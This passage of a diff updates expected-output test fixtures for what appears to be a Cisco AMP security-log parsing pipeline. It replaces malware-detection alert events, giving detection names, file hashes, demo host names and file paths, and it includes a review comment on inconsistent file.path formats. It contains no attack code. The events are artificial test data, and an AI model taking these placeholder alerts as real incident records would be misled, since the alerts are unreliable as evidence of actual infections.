"host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 266668, + "log.offset": 30055, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", 
@@ -4651,60 +1029,64 @@ ] }, { - "@timestamp": "2021-01-15T10:12:13.000Z", + "@timestamp": "2021-01-15T10:23:01.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257688561778754", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533670191031648308", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 874000000, + "cisco.amp.timestamp_nanoseconds": 926000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257688561779000, + "event.id": 6533670191031648000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", 
"input.type": "log", - "log.offset": 267987, + "log.offset": 31381, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", 
@@ -4712,60 +1094,64 @@ ] }, { - "@timestamp": "2021-01-15T10:12:02.000Z", + "@timestamp": "2021-01-15T10:23:01.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257641317138497", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533670191031648307", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 236000000, + "cisco.amp.timestamp_nanoseconds": 533000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257641317138000, + "event.id": 6533670191031648000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", 
"input.type": "log", - "log.offset": 269306, + "log.offset": 32700, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -4773,7 +1159,7 @@ ] }, { - "@timestamp": "2021-01-15T10:11:52.000Z", + "@timestamp": "2021-01-15T10:22:29.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", 
@@ -4784,42 +1170,39 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.DFC.MalParent", - "cisco.amp.detection_id": "6533667317698527247", - "cisco.amp.event_type_id": 1090519054, + "cisco.amp.detection": "W32.B1380FD95B-100.SBX.TG", + "cisco.amp.event_type_id": 1107296272, "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 641000000, - "event.action": "Threat Detected", + "cisco.amp.timestamp_nanoseconds": 0, + "event.action": "Executed malware", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6533667317698527000, + "event.id": 15212386047828, "event.kind": "alert", "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "event.severity": 3, + "event.start": "2021-01-15T10:22:29.000Z", "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", + "file.path": "file:///C%3A/ekjrngjker.exe", "fileset.name": "amp", "host.hostname": "Demo_AMP_Threat_Audit", "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 270625, + "log.offset": 34019, + "process.hash.sha256": "5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124", "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967" ], "related.hosts": [ "Demo_AMP_Threat_Audit" 
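Review bot: `file.path` on the new side of this hunk is a percent-encoded URI, `"file.path": "file:///C%3A/ekjrngjker.exe"`, while the event at the @@ -4418 hunk emits the same kind of field as a forward-slash path `"/C:/WINDOWS/system32/cmd.exe"` and the Threat Detected events use native `C:\\ekjrngjker.exe` / `\\\\?\\C:\\ekjrngjker.exe`; the same file therefore appears under three different spellings of `file.path` in one fixture. That defeats any detection or enrichment that matches on `file.path`, and makes `related.hash` the only reliable join key across these events. The raw connector payloads are not visible here, so it is possible the source exposes a URL for some event types and a path for others; if so the pipeline should normalize the URL form to a native path before setting `file.path` (or place the URL in `file.url` / `url.original`), and this expected output should be regenerated accordingly.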
@@ -4828,9 +1211,6 @@ "8.8.8.8", "10.10.10.10" ], - "related.user": [ - "user@testdomain.com" - ], "service.type": "cisco", "tags": [ "cisco-amp", 
@@ -4838,60 +1218,66 @@ ] }, { - "@timestamp": "2021-01-15T10:11:50.000Z", + "@timestamp": "2021-01-15T10:22:00.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257589777530944", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669929038643250", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 224000000, + "cisco.amp.timestamp_nanoseconds": 973000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257589777531000, + "event.id": 6533669929038643000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + 
"host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 274588, + "log.offset": 35375, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", 
@@ -4899,60 +1285,64 @@ ] }, { - "@timestamp": "2021-01-15T10:11:44.000Z", + "@timestamp": "2021-01-15T10:22:00.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257564007727167", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669929038643249", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 218000000, + "cisco.amp.timestamp_nanoseconds": 951000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257564007727000, + "event.id": 6533669929038643000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", 
"input.type": "log", - "log.offset": 275907, + "log.offset": 36701, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", 
@@ -4960,60 +1350,64 @@ ] }, { - "@timestamp": "2021-01-15T10:11:32.000Z", + "@timestamp": "2021-01-15T10:22:00.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257512468119614", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669929038643248", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 581000000, + "cisco.amp.timestamp_nanoseconds": 576000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257512468120000, + "event.id": 6533669929038643000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", 
"input.type": "log", - "log.offset": 277226, + "log.offset": 38020, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", 
@@ -5021,60 +1415,66 @@ ] }, { - "@timestamp": "2021-01-15T10:11:20.000Z", + "@timestamp": "2021-01-15T10:21:00.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257460928512061", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669671340605487", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 569000000, + "cisco.amp.timestamp_nanoseconds": 333000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257460928512000, + "event.id": 6533669671340605000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + 
"host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 278545, + "log.offset": 39339, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", 
@@ -5082,64 +1482,58 @@ ] }, { - "@timestamp": "2021-01-15T10:11:18.000Z", + "@timestamp": "2021-01-15T10:21:00.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "c6:4e:72:6f:69:14" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "Eldorado:Alureon-tpd", - "cisco.amp.detection_id": "5825617812646789131", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669671340605486", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Clean", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "c6:4e:72:6f:69:14" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 875000000, + "cisco.amp.timestamp_nanoseconds": 195000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 5825617812646789000, + "event.id": 6533669671340605000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "bfcc0861c7fb965c1f7473d3dc42cff6", - "file.hash.sha1": "420da91c3199993c9f245b21ea060b69d7ecfd49", - "file.hash.sha256": "aaa33c484a7728c49009afeaea27f0f87d7bdf27a46b61e4d0030f9d66cb6f33", - "file.name": "5A.tmp", - "file.path": "\\\\?\\C:\\WINDOWS\\Temp\\5A.tmp", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_TDSS", - "host.name": "Demo_TDSS", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", "host.os.family": "windows", 
"host.os.platform": "windows", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 279864, - "process.hash.md5": "60784f891563fb1b767f70117fc2428f", - "process.hash.sha1": "e6e904b84332191d44de729deb7bfed9bcef2ce9", - "process.hash.sha256": "e0b07f08e60ffbad36c2e58180f4b2a16dca47716044cbe0213df7b74d742f1f", - "process.name": "spoolsv.exe", - "process.pid": 1480, + "log.offset": 40665, "related.hash": [ - "aaa33c484a7728c49009afeaea27f0f87d7bdf27a46b61e4d0030f9d66cb6f33", - "bfcc0861c7fb965c1f7473d3dc42cff6", - "420da91c3199993c9f245b21ea060b69d7ecfd49" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_TDSS" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", 
@@ -5155,62 +1549,56 @@ ] }, { - "@timestamp": "2021-01-15T10:11:17.000Z", + "@timestamp": "2021-01-15T10:21:00.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "c6:4e:72:6f:69:14" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "Eldorado:Alureon-tpd", - "cisco.amp.detection_id": "5825617808351821830", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669671340605485", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "c6:4e:72:6f:69:14" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 812000000, + "cisco.amp.timestamp_nanoseconds": 170000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 5825617808351822000, + "event.id": 6533669671340605000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "4a052246c5551e83d2d55f80e72f03eb", - "file.hash.sha1": "bc29f1e8460915596e1dcafd0c92d6309457d149", - "file.hash.sha256": "b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5", - "file.name": "59.tmp", - "file.path": "\\\\?\\C:\\Documents and Settings\\admin\\Local Settings\\Temp\\59.tmp", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_TDSS", - "host.name": "Demo_TDSS", - "host.os.family": "windows", - "host.os.platform": "windows", + 
"host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 287092, - "process.hash.sha256": "b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5", - "process.name": "tdss.exe", - "process.pid": 3728, + "log.offset": 41991, "related.hash": [ - "b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5", - "4a052246c5551e83d2d55f80e72f03eb", - "bc29f1e8460915596e1dcafd0c92d6309457d149" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_TDSS" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", 
@@ -5226,60 +1614,64 @@ ] }, { - "@timestamp": "2021-01-15T10:11:09.000Z", + "@timestamp": "2021-01-15T10:20:59.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257409388904508", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669667045638188", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 56000000, + "cisco.amp.timestamp_nanoseconds": 779000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257413683872000, + "event.id": 6533669667045638000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", 
